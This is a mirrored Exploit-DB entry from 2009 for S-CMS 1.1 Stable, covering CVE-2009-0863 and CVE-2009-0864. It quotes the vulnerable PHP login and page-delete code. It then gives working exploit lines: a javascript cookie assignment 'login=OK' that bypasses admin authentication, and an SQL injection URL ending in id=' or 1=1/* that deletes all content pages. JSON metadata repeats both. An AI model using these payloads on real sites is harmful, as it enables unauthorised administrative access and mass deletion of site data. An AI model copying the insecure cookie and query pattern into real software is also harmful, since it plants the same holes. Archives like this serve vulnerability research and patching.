Search...

S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns

2009-02-17T00:00:00

ID EDB-ID:8071
Type exploitdb
Reporter x0r
Modified 2009-02-17T00:00:00

Description

S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform

                                        
                                            #########################################################################################
[0x01] Informations:

Name           : S-Cms 1.1 Stable 
Download       : http://www.hotscripts.com/listings/jump/download/87992/
Vulnerability  : Insecure Cookie Handling / Mass Page Delete
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login_action.php ... /admin/delete_page.php

[Code]

$user=$_POST['username'];
$pass=$_POST['password'];

$select_admin = mysql_query("SELECT * FROM cms_admin");

while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}

if ($user == $username && $pass == $password){
 
   setcookie("login", "OK", time() + $logintime); #0wn3d

[/code]

[CODE]
	
		$id=$_GET['id'];
		
		$delete=mysql_query("DELETE FROM cms_content WHERE id='$id'");
		
		
		if ($delete){
		
		echo ""._DELETE_PAGE_SUCCESS."";
		
		} else {
		
		echo ""._DELETE_PAGE_ERROR."";
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: 1- javascript:document.cookie = "login=OK; path=/"
         2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*

########################################################################################

# milw0rm.com [2009-02-17]

JSON Vulners Source

Initial Source

{"published": "2009-02-17T00:00:00", "id": "EDB-ID:8071", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 6.8}, "hash": "4446a80df3f7201e394fa1462f4c16e314a34136ddbd5653300f912ee1bbe310", "description": "S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/8071/", "lastseen": "2016-02-01T03:41:08", "edition": 1, "title": "S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns", "osvdbidlist": ["52570", "52571"], "modified": "2009-02-17T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0864", "CVE-2009-0863"], "sourceHref": "https://www.exploit-db.com/download/8071/", "references": [], "reporter": "x0r", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : S-Cms 1.1 Stable \nDownload : http://www.hotscripts.com/listings/jump/download/87992/\nVulnerability : Insecure Cookie Handling / Mass Page Delete\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian \n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/login_action.php ... /admin/delete_page.php\n\n[Code]\n\n$user=$_POST['username'];\n$pass=$_POST['password'];\n\n$select_admin = mysql_query(\"SELECT * FROM cms_admin\");\n\nwhile($dati_admin=mysql_fetch_array($select_admin)){\n$username=$dati_admin['username'];\n$password=$dati_admin['password'];\n}\n\nif ($user == $username && $pass == $password){\n \n setcookie(\"login\", \"OK\", time() + $logintime); #0wn3d\n\n[/code]\n\n[CODE]\n\t\n\t\t$id=$_GET['id'];\n\t\t\n\t\t$delete=mysql_query(\"DELETE FROM cms_content WHERE id='$id'\");\n\t\t\n\t\t\n\t\tif ($delete){\n\t\t\n\t\techo \"\"._DELETE_PAGE_SUCCESS.\"\";\n\t\t\n\t\t} else {\n\t\t\n\t\techo \"\"._DELETE_PAGE_ERROR.\"\";\n[/code]\n\n#########################################################################################\n[0x03] Exploit:\n\nExploit: 1- javascript:document.cookie = \"login=OK; path=/\"\n 2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*\n\n########################################################################################\n\n# milw0rm.com [2009-02-17]\n", "objectVersion": "1.0"}

{"result": {"cve": [{"id": "CVE-2009-0864", "type": "cve", "title": "CVE-2009-0864", "description": "S-Cms 1.1 Stable allows remote attackers to bypass authentication and obtain administrative access via an OK value for the login cookie.", "published": "2009-03-10T10:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0864", "cvelist": ["CVE-2009-0864"], "lastseen": "2017-09-29T14:26:32"}, {"id": "CVE-2009-0863", "type": "cve", "title": "CVE-2009-0863", "description": "SQL injection vulnerability in admin/delete_page.php in S-Cms 1.1 Stable allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2009-03-10T10:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0863", "cvelist": ["CVE-2009-0863"], "lastseen": "2017-09-29T14:26:32"}]}}